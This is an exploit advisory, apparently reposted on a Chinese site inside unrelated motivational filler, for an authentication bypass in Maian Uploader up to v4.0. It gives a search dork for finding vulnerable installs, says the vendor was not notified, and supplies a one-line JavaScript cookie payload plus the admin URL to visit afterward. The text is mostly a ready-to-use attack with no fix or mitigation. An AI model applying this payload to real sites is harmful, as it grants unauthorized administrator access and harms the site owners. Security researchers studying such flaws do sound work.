Maian Uploader

失败与挫折并不可怕,可怕的是丧失了自信,丧失了激发我们积极向上的内在动力。让我们重拾信心,始终坚信:人生航船由我们自己掌舵,只要鼓起自信的风帆,就能战胜风浪,抵达美好彼岸。
-[*] ================================================================================ [*]-
-[*] Maian Uploader <= v4.0 Insecure Cookie Handling Vulnerability [*]-
-[*] ================================================================================ [*]-



[*] Discovered By: S.W.A.T.
[*] E-Mail: svvateam[at]yahoo[dot]com
[*] Script Download: http://www.maianscriptworld.co.uk
[*] DORK: Powered by: Maian Uploader v4.0



[*] Vendor Has Not Been Notified!



[*] DESCRIPTION:

Maian Uploader suffers from a insecure cookie, the admin panel only checks if the cookie

exists.
and not the content. so we can easyily craft a cookie and look like a admin.



[*] Vulnerability:

javascript:document.cookie = "uploader_cookie=1; path=/";


[*] NOTE/TIP:

after running the javascript, visit "/admin/index.php" to view admin area.



-[*] ================================================================================ [*]-
-[*] Maian Uploader <= v4.0 Insecure Cookie Handling Vulnerability [*]-
-[*] ================================================================================ [*]-

本文Maian Uploader 到此结束。怀揣着朝气蓬勃的心迎接每一个黎明与黄昏小编再次感谢大家对我们的支持!